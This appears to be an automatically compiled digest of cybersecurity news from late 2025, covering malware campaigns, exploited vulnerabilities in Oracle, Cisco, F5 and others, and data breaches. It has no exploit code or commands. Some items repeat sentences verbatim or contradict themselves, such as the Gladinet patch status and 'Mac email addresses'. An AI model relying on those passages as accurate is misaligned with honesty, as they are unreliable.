OpenAI has confirmed that GPT-6 will not be released in 2025. The company currently offers several models under the GPT-5 umbrella, including GPT-5 Auto, which switches between reasoning and non-reasoning models based on the query. GPT-5-instant provides faster responses using a non-reasoning model. OpenAI has clarified that while GPT-6 is not coming this year, updates to existing models, such as GPT-5.5, may be released.

A sophisticated malware campaign, codenamed GPUGate, targets IT and software development companies in Western Europe, with recent expansions to macOS users. The campaign leverages Google Ads, SEO poisoning, and fake GitHub commits to deliver malware, including the Atomic macOS Stealer (AMOS) and Odyssey. The attack began in December 2024 and uses a 128 MB Microsoft Software Installer (MSI) to evade detection. The malware employs GPU-gated decryption and various techniques to avoid analysis and detection. The end goal is information theft and delivery of secondary payloads. The threat actors have native Russian language proficiency and use a cross-platform approach. The campaign has expanded to target macOS users through fake Homebrew, LogMeIn, and TradingView platforms. These platforms impersonate popular tools and use SEO poisoning to distribute the Atomic Stealer malware and Odyssey. The threat actors use multiple GitHub usernames to evade takedowns and deploy malware via Terminal commands. Similar tactics have been observed in previous campaigns using malicious Google Ads and public GitHub repositories. The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems. The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.

A new campaign targeting the Russian automobile and e-commerce sectors uses a previously undocumented .NET malware, CAPI Backdoor. The attack chain involves phishing emails with ZIP archives containing a decoy document and a malicious Windows shortcut file. The malware, disguised as 'adobe.dll', uses legitimate Microsoft binaries to execute and establish persistence. It can steal data from browsers, take screenshots, and exfiltrate information. The campaign includes a domain impersonating a legitimate Russian automotive site.

The Silver Fox threat group has expanded its Winos 4.0 attacks to target Japan and Malaysia using the HoldingHands RAT. This campaign involves phishing emails with malicious PDFs and exploits SEO poisoning to distribute malware. The group has been active since at least March 2024, targeting various sectors in China, Taiwan, Japan, and Malaysia. The malware employs sophisticated techniques to evade detection and maintain persistence on compromised systems. The HoldingHands RAT is designed to connect to a remote server, send host information, and execute commands from the attacker. It includes features to update the command-and-control (C2) address via a Windows Registry entry. The malware is equipped to capture sensitive information, run arbitrary commands, and download additional payloads. The group has also been linked to Operation Silk Lure, targeting Chinese fintech, cryptocurrency, and trading platform sectors with highly targeted phishing emails containing malicious .LNK files.

ConnectWise has released a security update for its Automate product to address two vulnerabilities. The most severe, CVE-2025-11492, allows for cleartext transmission of sensitive information, potentially exposing communications to adversary-in-the-middle (AiTM) attacks. The second, CVE-2025-11493, involves a lack of integrity verification for update packages. The vulnerabilities affect on-premises deployments of Automate, a remote monitoring and management (RMM) platform used by managed service providers (MSPs) and IT departments. The update is marked as a moderate priority, and administrators are advised to install it as soon as possible. These vulnerabilities could allow attackers to intercept or modify traffic, including commands, credentials, and update payloads, potentially leading to the installation of malicious files.

The Clop ransomware gang has been exploiting multiple vulnerabilities in Oracle E-Business Suite since at least August 2025, including the zero-day vulnerability CVE-2025-61882. The gang has been sending extortion emails to executives at multiple organizations, claiming to have stolen sensitive data. The campaign involves a high-volume email blast from hundreds of compromised accounts, some previously linked to the FIN11 threat group. The emails contain contact addresses known to be listed on the Clop ransomware gang's data leak site. CrowdStrike attributes the exploitation of CVE-2025-61882 to the Cl0p ransomware gang with moderate confidence, and the first known exploitation occurred on August 9, 2025. The exploit involves an HTTP request to /OA_HTML/SyncServlet, resulting in an authentication bypass. Oracle has released an emergency patch for the zero-day vulnerability and shared indicators of compromise. The exploit was leaked by a group called Scattered Lapsus$ Hunters, raising questions about their potential collaboration with Clop. Envoy Air, a subsidiary of American Airlines, confirms that data was compromised from its Oracle E-Business Suite application after the Clop extortion gang listed American Airlines on its data leak site. Envoy Air stated that no sensitive or customer data was affected, but a limited amount of business information and commercial contact details may have been compromised. The Clop gang is also extorting Harvard University, with the university confirming that the incident impacts a limited number of parties associated with a small administrative unit. Oracle has confirmed that known vulnerabilities in its E-Business Suite, patched in July 2025, may have been exploited in these attacks. The July 2025 Critical Patch Update addressed 309 vulnerabilities across Oracle's product range, including nine for E-Business Suite. Three of these vulnerabilities are critical and three others are exploitable remotely without authentication. The extortion emails are part of a broader campaign, with the attackers sending messages from compromised accounts, some previously associated with the FIN11 threat group. The emails contain contact addresses known to be listed on the Clop ransomware gang's data leak site. Mandiant and GTIG are investigating the claims and recommend that organizations receiving these emails investigate their environments for unusual access or compromise in their Oracle E-Business Suite platforms. The UK’s National Cyber Security Centre (NCSC) has advised Oracle EBS customers to patch the critical vulnerability CVE-2025-61882, which is being exploited by the Clop ransomware group. The NCSC has urged customers to apply an emergency security update from Oracle, published over the weekend, to address the zero-day vulnerability CVE-2025-61882. The vulnerability impacts Oracle EBS versions 12.2.3-12.2.14 and allows unauthenticated attackers to send specially crafted HTTP requests to the affected component, resulting in full system compromise. The NCSC has warned that the Scattered Lapsus$ Hunters group has leaked the exploit used by the Clop gang, increasing the risk of opportunistic attacks on Oracle customers. Rapid7 has advised customers of affected Oracle EBS instances to conduct threat hunting to detect any potential malicious activity, given that exploitation in-the-wild may have occurred since August 2025. CISA has added CVE-2025-61882 to the Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by October 27, 2025. WatchTowr Labs warns of potential mass, indiscriminate exploitation from multiple groups within days.

Microsoft has lifted multiple compatibility holds that previously prevented Windows 11 24H2 upgrades on devices with specific hardware and software configurations. The latest holds removed were for devices with SenseShield Technology's sprotect.sys driver and wallpaper customization applications. Additionally, earlier holds were removed for devices with integrated cameras due to a face detection bug and for devices with Dirac audio software causing audio device detection issues. The issues affected systems with various software components, leading to problems such as blue or black screen of death (BSOD), desktop icon issues, and audio device malfunctions. Microsoft has released updates and new drivers to address these compatibility issues, allowing eligible devices to upgrade to Windows 11 24H2 via Windows Update. Users may encounter warnings about potential incompatibilities during the upgrade process and are advised to update or uninstall problematic applications.

European law enforcement dismantled an illegal SIM-box service that facilitated over 3,200 fraud cases and caused at least 4.5 million euros in losses. The service provided phone numbers for telecommunication crimes, including phishing, investment fraud, impersonation, and extortion. The operation, codenamed 'SIMCARTEL,' involved multiple countries and seized significant infrastructure and assets. The SIM-box service operated through two websites, gogetsms.com and apisim.com, which have been seized. The service rented out phone numbers registered in over 80 countries, enabling the creation of fraudulent online accounts. The operation resulted in the arrest of seven individuals and the seizure of 1,200 SIM-box devices, 40,000 SIM cards, five servers, and luxury vehicles. Financial assets totaling EUR 431,000 and $333,000 in crypto were also frozen.

AI chatbot data has become a critical tool in criminal investigations, providing detailed insights into users' intentions and actions. The Palisades Fire case in January 2025 highlighted how AI chat logs can be used to trace criminal intent. This development underscores the need for enterprises to secure AI chat data, as it can reveal sensitive information about business plans, competitive research, and other confidential activities. The use of AI chatbot data in legal proceedings is expected to increase, making it essential for organizations to implement robust security measures to protect this data. AI companies are also enhancing their capabilities to detect and report malicious activities, further emphasizing the importance of securing AI interactions.

Microsoft patched a high-severity HTTP request smuggling vulnerability (CVE-2025-55315) in the Kestrel web server for ASP.NET Core. The flaw could allow authenticated attackers to hijack user credentials or bypass security controls. The vulnerability affects multiple versions of ASP.NET Core and has been addressed with security updates. Microsoft advises developers and users to update their applications to mitigate potential attacks.

Three Dutch teenagers, aged 17, are suspected of providing services to a foreign power, with one having ties to a Russian-government affiliated hacker group. One of the suspects instructed the others to map WiFi networks in The Hague for digital espionage and cyber-attacks. The investigation, led by the State Interference Team of the National Investigation and Interventions Unit, began after a report from the Military Intelligence and Security Service (MIVD). The first two suspects were arrested on September 22, while a third suspect was interviewed and had data devices confiscated but was not arrested due to his limited role. The Netherlands updated its Criminal Code in May 2025 to include penalties for digital espionage, with a maximum sentence of eight years, extendable to 12 years in serious cases. On September 23, 2025, two Dutch teenagers were arrested for attempting to spy on Europol and other targets in The Hague using WiFi sniffer devices. The teens were recruited via Telegram and were acting on behalf of Russian interests. The incident involved reconnaissance activities near Europol, Eurojust, and the Canadian embassy. Europol confirmed the incident but stated there were no signs of a compromise on their systems. One of the teens was placed on home bail with an ankle monitor, while the other remained in custody. Investigators seized electronic equipment from the teen's home. The teen's father reported that his son has a part-time job, is a heavy gamer, and is computer savvy with a fascination for hacking. Similar incidents involving individuals recruited by Russian hackers were recently reported in Germany and Ukraine. Dutch Prime Minister Dick Schoof noted that the incident fits a pattern of a type of hybrid attack conducted by Russia against Europe. The news illustrates what may be a rising trend of Russian threat actors utilizing the youth of foreign countries to do their dirty work. The alleged use of a simple Wi-Fi sniffer emphasizes how nation-state actors can outsource reconnaissance to impressionable youth via social media, propaganda, and ultimately shield themselves from attribution.

VMware certifications have significantly boosted the careers of IT professionals, enabling them to transition from technical roles to leadership positions. The certifications provide a structured framework for understanding complex IT environments, troubleshooting, and communicating effectively with leadership. The certification journey involves hands-on practice, community engagement, and a focus on long-term architecture, transforming individuals from reactive operators to proactive strategists. The VMUG Advantage community plays a crucial role in this transformation, offering resources, mentorship, and a global network of professionals. Additionally, VMware certifications boost confidence in pursuing new job opportunities and help build more secure, scalable, and consistent environments. VMUG Advantage provides discounts on training, personal-use licenses, on-demand labs, and access to a global community, accelerating career growth and empowering IT teams.

Microsoft's October Windows 11 updates (KB5066835) and September's KB5065789 preview update have caused issues with localhost (127.0.0.1) HTTP/2 connections. Users are experiencing errors such as 'ERR_CONNECTION_RESET' or 'ERR_HTTP2_PROTOCOL_ERROR' when attempting to connect to localhost. This affects various applications, including Visual Studio debugging, SSMS Entra ID authentication, and the Duo Desktop app. The issue also affects Windows Server 2025 systems and is linked to a bug in the HTTP.sys Windows-based web server for ASP.NET Core. Microsoft has provided a temporary fix via Known Issue Rollback (KIR) for non-managed business devices and most home users. IT administrators can resolve the issue on managed devices by installing and configuring a specific KIR group policy. A permanent fix will be included in a future Windows update.

The North Korean threat group Scarcruft (APT37) has expanded its campaign targeting South Korea with a combination of infostealers, backdoors, and ransomware. The campaign, dubbed ChinopuNK, began in July 2025 and includes multiple malware tools designed for espionage and financial gain. The attacks start with phishing emails containing decoy documents about postal code updates. Once opened, these documents download NubSpy, a backdoor that uses the PubNub cloud service for command-and-control (C2) communication. The group also deploys ChillyChino, a PowerShell backdoor rewritten in Rust, and VCD ransomware, which encrypts specific file paths tailored to individual targets. In September 2025, a new phishing campaign, Operation HanKook Phantom, was discovered. This campaign targets individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. The campaign uses spear-phishing emails with a lure for a "National Intelligence Research Society Newsletter" containing a ZIP archive attachment with a Windows shortcut (LNK) masquerading as a PDF document. The LNK file drops RokRAT malware, which is capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. RokRAT exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud. The campaign also involves a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation. Additionally, a modular backdoor malware for the macOS platform, ChillyHell, has resurfaced with a new version. This malware gives attackers remote access and allows them to drop payloads or brute-force passwords. The new ChillyHell sample was uploaded to VirusTotal on May 2, 2025, and was notarized by Apple in 2021. The malware has multiple persistence mechanisms and can exfiltrate data, drop additional payloads, enumerate user accounts, and perform local password cracking. Apple revoked notarization of the developer certificates associated with the malware once notified by Jamf. A new malware family, ZynorRAT, has been discovered, targeting Windows, Linux, and macOS systems. ZynorRAT uses a Telegram bot for command and control and supports a wide range of functions, including file exfiltration, system enumeration, and arbitrary command execution. The North Korea-linked threat actors associated with the Contagious Interview campaign have been attributed to a previously undocumented backdoor called AkdoorTea, along with tools like TsunamiKit and Tropidoor. The campaign targets software developers across all operating systems, Windows, Linux, and macOS, particularly those involved in cryptocurrency and Web3 projects. The campaign involves impersonated recruiters offering lucrative job roles over platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List. The attacks deliver several pieces of malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost. WeaselStore's functionality is similar to BeaverTail and InvisibleFerret, focusing on exfiltration of sensitive data from browsers and cryptocurrency wallets. TsunamiKit is a malware toolkit designed for information and cryptocurrency theft, first discovered in November 2024. TsunamiKit comprises several components, including TsunamiLoader, TsunamiInjector, TsunamiInstallor, TsunamiHardener, and TsunamiClient. TsunamiClient incorporates a .NET spyware and drops cryptocurrency miners like XMRig and NBMiner. Tropidoor is a sophisticated payload linked to the DeceptiveDevelopment group, sharing code with PostNapTea and LightlessCan. AkdoorTea is a remote access trojan delivered by a Windows batch script, sharing commonalities with Akdoor and NukeSped (Manuscrypt). The DeceptiveDevelopment campaign targets developers associated with cryptocurrency and decentralized finance projects with fake job offers aimed at information theft and malware infection. The campaign supplies stolen developer information to North Korea’s fraudulent IT workers, who use it to pose as job seekers and land remote work at unsuspecting companies. The campaign involves tight collaboration with North Korea’s network of fraudulent IT workers, tracked as WageMole. The North Korean IT workers operate in teams, focusing on obtaining work in Western countries, particularly the US, and in Europe, targeting France, Poland, Ukraine, and Albania. The North Korean IT workers impersonate real companies and engineers, producing engineering drawings with falsified approval stamps, and focus on self-education in web programming, blockchain, English, and AI integration. The Contagious Interview campaign has expanded to include malicious packages in npm, PyPI, and RubyGems ecosystems. The campaign uses Discord webhooks as a command-and-control (C2) channel to exfiltrate data. The malicious packages include mysql-dumpdiscord (npm), nodejs.discord (npm), malinssx, malicus, and maliinn (PyPI), and sqlcommenter_rails (RubyGems.org). The campaign has published 338 malicious packages, downloaded over 50,000 times, using more than 180 fake personas and over a dozen C2 endpoints. The campaign targets Web3, cryptocurrency, and blockchain developers, as well as job seekers in the technical sector. The malware families delivered include HexEval, XORIndex, encrypted loaders, BeaverTail, and InvisibleFerret. The campaign involves typosquatting and lookalike libraries to deceive developers. North Korean hackers have adopted the 'EtherHiding' technique that leverages smart contracts to host and deliver malware in social engineering campaigns that steal cryptocurrency. The technique of EtherHiding was first described by Guardio Labs in 2023. The EtherHiding technique is resilient to conventional takedown and blocklisting efforts. The identity of an attacker using EtherHiding is difficult to trace due to the pseudonymous nature of blockchain transactions. EtherHiding represents a shift towards next-generation bulletproof hosting where the inherent features of blockchain technology are used for malicious purposes. A DPRK nation state threat actor, tracked internally as UNC5342, has been employing EtherHiding since February in Contagious Interview operations. The smart contract hosts the JADESNOW downloader that interacts with Ethereum to fetch the third-stage payload, which is a JavaScript version of the InvisibleFerret malware. The payload runs in memory and may ask Ethereum for an additional component that steals credentials. The credential stealer component targets passwords, credit cards, and cryptocurrency wallet (MetaMask and Phantom) information stored on web browsers like Chrome and Edge. The malware runs in the background and listens for incoming commands from its command and control (C2), like executing arbitrary commands and exfiltrating files in ZIP form to an external server or Telegram. The Contagious Interview campaign employs a multi-stage malware infection process involving JADESNOW, BEAVERTAIL, and INVISIBLEFERRET. The Contagious Interview campaign targets developers in the cryptocurrency and technology sectors to steal sensitive data, cryptocurrency, and gain persistent access to corporate networks. The Contagious Interview campaign uses elaborate social engineering tactics that mimic legitimate recruitment processes through fake recruiters and fabricated companies. Fake recruiters lure candidates onto platforms like Telegram or Discord, then deliver malware through deceptive coding tests or fake software downloads disguised as technical assessments or interview fixes. The Contagious Interview campaign affects Windows, macOS, and Linux systems.

Over 266,000 F5 BIG-IP instances are exposed online, potentially vulnerable to remote attacks following a breach disclosed by F5. The company has released security updates to address 44 vulnerabilities, including those stolen in the breach. F5 has not found evidence that the stolen information has been used in actual attacks or disclosed publicly. The breach was attributed to a highly sophisticated nation-state threat actor, and F5 has taken extensive actions to contain the threat. F5's BIG-IP is a critical product used in application delivery networking and traffic management by many large enterprises. The company has 23,000 customers in 170 countries, including 48 of the Fortune 50 entities. The breach did not compromise F5's software supply chain or result in suspicious code modifications. The company has validated the safety of BIG-IP releases through multiple independent reviews by leading cybersecurity firms and has advised users to apply the latest updates for BIG-IP and related products. The breach involved a nation-state threat actor gaining persistent, long-term access to F5's product development environment and engineering knowledge management platforms. F5 disclosed the breach on October 15, 2025, confirming that the attack was detected in August 2025. The threat actor exfiltrated files containing BIG-IP source code and information regarding undisclosed vulnerabilities. F5 has not found evidence of access to or exfiltration of data tied to its CRM, financial, support case management, or iHealth systems, nor the NGINX source code or product development environment. F5 has identified no evidence of modification to its software supply chain, including source code, build pipeline, and release pipeline. F5 has worked with multiple incident response firms and law enforcement to mitigate the event and believes it has contained the threat. F5 has rotated credentials, strengthened access controls, deployed improved inventory and patch management automation, integrated better monitoring and detection tools, and implemented enhancements to network security infrastructure. F5 advises customers to apply the latest BIG-IP updates and has shared guidance for hardening customers' systems. On October 15, 2025, CISA directed federal civilian executive branch (FCEB) agencies to inventory F5 BIG-IP products and apply updates where necessary. The US government has urged federal agencies to take immediate action after F5 revealed it had been breached by a nation-state actor. The US Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive demanding that federal agencies evaluate if the networked management interfaces are accessible from the public internet and apply updates from F5. CISA warned that the threat actor's access to the F5 development environment could enable it to conduct static and dynamic analysis to discover logical flaws, zero-day vulnerabilities, and targeted exploits. The Justice Department ordered a delay in public disclosure of the breach on September 12, 2025. F5 has improved internal security including access controls, inventory and patch management, network security, and monitoring of all software development platforms. Tom Kelermann, VP of cyber risk at Hitrust, argued that the F5 breach is likely to be the first stage in a supply chain campaign. Ilia Kolochenko, CEO of ImmuniWeb, agreed that the stolen IP could be used to craft zero-day exploits for subsequent APT campaigns.

Cybercriminals have exploited lax authentication settings in Zendesk to flood targeted email inboxes with spam messages. The attacks use hundreds of Zendesk corporate customers simultaneously, sending notifications from customer domain names. Zendesk acknowledged the issue and is investigating additional preventive measures. The abuse involves sending ticket creation notifications from customer accounts that allow anonymous submissions. This allows attackers to create support tickets with any chosen subject line, including menacing or insulting messages. The notifications appear to come from legitimate customer domains, making them harder to filter out. Zendesk recommends customers configure authenticated ticket creation workflows to prevent such abuse, but some customers prefer anonymous environments for various business reasons.

Identity security has become the primary defense mechanism for enterprises. The increasing use of AI agents and automated systems has expanded attack surfaces, making identity management crucial. Organizations with mature identity security programs achieve higher ROI and better risk reduction. However, many organizations lag in identity security maturity, leaving them vulnerable to modern threats. The 2025-2026 SailPoint Horizons of Identity Security report highlights the strategic importance of identity security. It shows that mature identity programs prevent breaches, drive operational efficiency, and enable new business capabilities. Organizations must proactively assess their identity security posture to manage risks effectively.

Prosper, a peer-to-peer lending marketplace, experienced a data breach on September 2, 2025, exposing personal information of 17.6 million accounts. The stolen data includes Social Security numbers, names, government-issued IDs, employment status, credit status, income levels, dates of birth, physical addresses, IP addresses, and browser user agent details. The breach was attributed to a threat actor named Hiron. The company has not found evidence of unauthorized access to customer accounts or funds. Prosper disclosed the breach on September 2, 2025, and has since collaborated with law enforcement and deployed enhanced security controls. The company is offering free credit monitoring to affected individuals once the full scope of the breach is determined.

WatchGuard has released security updates to address a critical remote code execution vulnerability (CVE-2025-9242) in Firebox firewalls. This flaw, caused by an out-of-bounds write weakness, affects devices running Fireware OS 11.x, 12.x, and 2025.1. Successful exploitation can allow attackers to execute malicious code remotely on vulnerable devices. The vulnerability impacts devices configured to use IKEv2 VPN, and devices may remain at risk even if the vulnerable configurations have been deleted. WatchGuard has provided patches and a temporary workaround for administrators who cannot immediately update their devices. The vulnerability is not yet being exploited in the wild, but administrators are advised to patch their devices promptly. The vulnerability is tracked as CVE-2025-9242 with a CVSS score of 9.3. The flaw is present in the function 'ike2_ProcessPayload_CERT' in the file 'src/ike/iked/v2/ike2_payload_cert.c'.

Infostealers are a significant driver of the current ransomware wave, with stealer logs available for as little as $10 on the dark web. Security experts recommend deploying specific technical defenses to mitigate the threat. Infostealers have evolved over the years, integrating various capabilities to extract sensitive information. The evolution of infostealers, from early keyloggers like Zeus and SpyEye to modern variants like LummaC2 and Redline, highlights the need for robust security measures. Experts advise implementing technical controls such as regular password changes, FIDO2-enabled multifactor authentication, forced authentication, session token expiration, cookie replay detection, and monitoring for suspicious travel patterns. These measures are crucial for protecting against infostealer infections and the subsequent ransomware attacks.

A new malvertising campaign uses SEO poisoning to distribute fake Microsoft Teams installers that deploy the Oyster backdoor on Windows devices. The malware provides attackers with remote access to corporate networks, enabling command execution, payload deployment, and file transfers. The campaign targets users searching for 'Teams download,' leading them to a fake site that mimics Microsoft's official download page. The malicious installer, signed with legitimate certificates, drops a DLL into the %APPDATA%\Roaming folder and creates a scheduled task for persistence. Microsoft revoked over 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks in early October. The threat group Vanilla Tempest, also tracked as VICE SPIDER and Vice Society, is a financially motivated actor that focuses on deploying ransomware and exfiltrating data for extortion. The Oyster malware, also known as Broomstick and CleanUpLoader, has been linked to multiple campaigns and ransomware operations, such as Rhysida. The campaign was first disclosed by Blackpoint Cyber in September 2025, highlighting how users searching for Teams online were redirected to bogus download pages, where they were offered a malicious MSTeamsSetup.exe instead of the legitimate client. The threat actor used Trusted Signing, SSL.com, DigiCert, and GlobalSign code signing services to sign the malicious installers and other post-compromise tools.

Sotheby's, a leading global auction house, detected a data breach on July 24, 2025, where threat actors stole sensitive employee information, including financial details. The breach was discovered in July 2025, but the investigation took two months to determine the extent of the data stolen and the individuals impacted. The exposed information includes full names, Social Security numbers (SSNs), and financial account information. The total number of impacted individuals remains undisclosed, but at least four individuals in Maine and Rhode Island were affected. Sotheby's has offered a 12-month free identity protection and credit monitoring service through TransUnion to affected employees.

Microsoft Office 2016 and Office 2019 have reached the end of extended support on October 14, 2025. This means no further updates, security fixes, or technical support will be available for these versions. Users are advised to upgrade to Microsoft 365 Apps or standalone versions like Office 2024 and Office LTSC 2024 to avoid security, compliance, and performance issues. Visio 2016/2019, Project 2016/2019, Skype for Business 2016 and 2019, and related apps have also reached the end of support. Microsoft has issued multiple reminders to migrate to supported versions.

Active exploitation of an unpatched security flaw in Gladinet CentreStack and TrioFox products continues. The zero-day vulnerability, CVE-2025-11371, is an unauthenticated local file inclusion bug that allows unintended disclosure of system files. This flaw affects all versions prior to and including 16.7.10368.56560. The vulnerability has been exploited to retrieve the machine key from the application Web.config file, enabling remote code execution via a ViewState deserialization vulnerability. Three customers have been impacted so far. A patch for the zero-day vulnerability CVE-2025-11371 is now available in CentreStack version 16.10.10408.56683. Users are advised to upgrade to this version or, if upgrading is not possible, disable the "temp" handler within the Web.config file for UploadDownloadProxy to mitigate the risk. The vendor, Gladinet, has been notified and is working on a fix. The vulnerability was detected by researchers at Huntress on September 27, 2025. The flaw was exploited to obtain a machine key and execute code remotely. The attack used an older deserialization vulnerability (CVE-2025-30406) to achieve remote code execution (RCE) through ViewState. The mitigations will impact some functionality of the platform but prevent exploitation of CVE-2025-11371.

Cisco has released security updates to address a high-severity zero-day vulnerability (CVE-2025-20352) in Cisco IOS and IOS XE Software. The flaw is a stack-based buffer overflow in the Simple Network Management Protocol (SNMP) subsystem, actively exploited in attacks. This vulnerability allows authenticated, remote attackers to cause denial-of-service (DoS) conditions or gain root control of affected systems. The vulnerability impacts all devices with SNMP enabled, including specific Cisco devices running Meraki CS 17 and earlier. Cisco advises customers to upgrade to a fixed software release, specifically Cisco IOS XE Software Release 17.15.4a, to remediate the vulnerability. Temporary mitigation involves limiting SNMP access to trusted users and disabling the affected Object Identifiers (OIDs) on devices. Additionally, Cisco patched 13 other security vulnerabilities, including two with available proof-of-concept exploit code. Cisco also released patches for 14 vulnerabilities in IOS and IOS XE, including eight high-severity vulnerabilities. Proof-of-concept exploit code exists for two of the vulnerabilities, but exploitation is not confirmed. Three additional medium-severity bugs affect Cisco’s SD-WAN vEdge, Access Point, and Wireless Access Point (AP) software. Cybersecurity researchers have disclosed details of a new campaign, codenamed "Operation Zero Disco", that exploited CVE-2025-20352 to deploy Linux rootkits on older, unprotected systems. The attacks targeted Cisco 9400, 9300, and legacy 3750G series devices, and involved the exploitation of a modified Telnet vulnerability (based on CVE-2017-3881) to enable memory access. The rootkits allowed attackers to achieve remote code execution and gain persistent unauthorized access by setting universal passwords and installing hooks into the Cisco IOS daemon (IOSd) memory space. The attacks singled out victims running older Linux systems without endpoint detection response solutions, using spoofed IPs and Mac email addresses. The rootkit sets a universal password that includes the word "disco" in it, and the malware installs several hooks onto the IOSd, resulting in fileless components disappearing after a reboot. Newer switch models provide some protection via Address Space Layout Randomization (ASLR). The campaign used a UDP controller on infected switches to toggle logs, bypass authentication, and conceal configuration changes. The rootkit allowed attackers to hide running-config items such as account names, EEM scripts, and ACLs. The rootkit could bypass VTY ACLs and reset the last running-config write timestamp. The rootkit could toggle or delete device logs. The attacks against 32-bit builds included an SNMP exploit that split command payloads across packets. For 64-bit targets, attackers needed guest shell access at level 15 to install a fileless backdoor and use a UDP controller for remote management. The rootkit granted several covert capabilities, including acting as a UDP listener on any port for remote commands. The rootkit created a universal password by modifying IOSd memory. The rootkit could hide running-config items such as account names, EEM scripts, and ACLs. The rootkit could bypass VTY ACLs and reset the last running-config write timestamp. The rootkit could toggle or delete device logs. The attacks targeted older Linux hosts lacking endpoint detection response, where fileless components could disappear after reboot, yet still enable lateral movement. Trend Research recovered multiple exploit variants for 32-bit and 64-bit platforms. The operation impacted Cisco 9400 series, 9300 series, and legacy 3750G devices. Cisco provided forensic support that helped confirm affected models and assisted the investigation. The attacks involved a Telnet variant used to permit arbitrary memory access.

A financially motivated threat actor, UNC5142, has been exploiting blockchain smart contracts to distribute information stealers such as Atomic, Lumma, Rhadamanthys, and Vidar on Windows and macOS systems. The attacks leverage compromised WordPress websites and a technique called 'EtherHiding' to hide malicious code on public blockchains. The campaign uses a multi-stage JavaScript downloader named CLEARSHORT to deliver malware, with the first stage interacting with a malicious smart contract on the BNB Smart Chain. The smart contract retrieves a landing page from an external server, which then employs social engineering tactics to infect the system. Google Threat Intelligence Group (GTIG) flagged about 14,000 web pages containing injected JavaScript associated with UNC5142, indicating a broad targeting of vulnerable WordPress sites. However, no activity has been observed since July 23, 2025.

A critical misconfiguration flaw in Adobe Experience Manager (AEM) Forms on JEE versions 6.5.23.0 and earlier is under active exploitation. The flaw, CVE-2025-54253, allows arbitrary code execution via an exposed servlet. Adobe released a patch in August 2025. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Federal agencies must apply the necessary fixes by November 5, 2025. The flaw was discovered by Adam Kues and Shubham Shah of Searchlight Cyber, who disclosed it to Adobe on April 28, 2025. The flaw is caused by an exposed /adminui/debug servlet that evaluates user-supplied OGNL expressions as Java code without authentication or input validation. This enables attackers to execute arbitrary system commands with a single crafted HTTP request. A proof-of-concept exploit is publicly available.

A new Linux rootkit named LinkPro has been discovered, leveraging eBPF to hide its presence and activate via specific TCP packets. The rootkit was found during an investigation into a compromised AWS-hosted infrastructure. Attackers exploited a vulnerable Jenkins server to deploy the rootkit, which uses a combination of eBPF modules and a shared library to conceal its activities and communicate with a command-and-control (C2) server. The rootkit can operate in both passive and active modes, supporting multiple communication protocols. It achieves persistence through a systemd service and modifies system configurations to hide its presence. The attackers used a malicious Docker image and additional malware to facilitate the infection.

Organizations are shifting from reactive to preemptive cyber defense strategies, driven by the need to manage exposures in hybrid and distributed environments. Unified Exposure Management Platforms (UEMPs) are emerging as a solution to continuously identify, validate, and remediate vulnerabilities. UEMPs integrate asset discovery, vulnerability assessment, and remediation into a single process, providing actionable insights that align with business outcomes. This approach aims to prevent breaches rather than just respond to them, addressing the limitations of traditional Managed Detection and Response (MDR) services. The shift is driven by increased regulatory scrutiny, expanded attack surfaces due to cloud migration and AI automation, and the rapid weaponization of vulnerabilities by sophisticated adversaries.

Microsoft's Digital Defense Report 2025 highlights a dramatic escalation in AI-driven cyber attacks. Microsoft systems analyze over 100 trillion security signals daily, indicating the growing sophistication and volume of cyber threats. Adversaries are leveraging generative AI to automate phishing, scale social engineering, and discover vulnerabilities faster than humans can patch them. Autonomous malware adapts tactics in real-time to bypass security systems, and AI tools themselves are becoming high-value targets. Microsoft's AI-powered defenses have reduced response times from hours to seconds, but defenders must remain vigilant as AI increases the speed and impact of cyber operations. Identity compromise remains a dominant attack vector, with phishing and social engineering accounting for 28% of breaches. Multi-factor authentication (MFA) prevents over 99% of unauthorized access attempts, but adoption rates are uneven. The rise of infostealers has fueled credential-based intrusions. The United States accounted for 24.8% of all observed attacks between January and June 2025, followed by the United Kingdom, Israel, and Germany. Government agencies, IT providers, and research institutions were among the most frequently targeted sectors. Ransomware remains a primary threat, with over 40% of recent cases involving hybrid cloud components.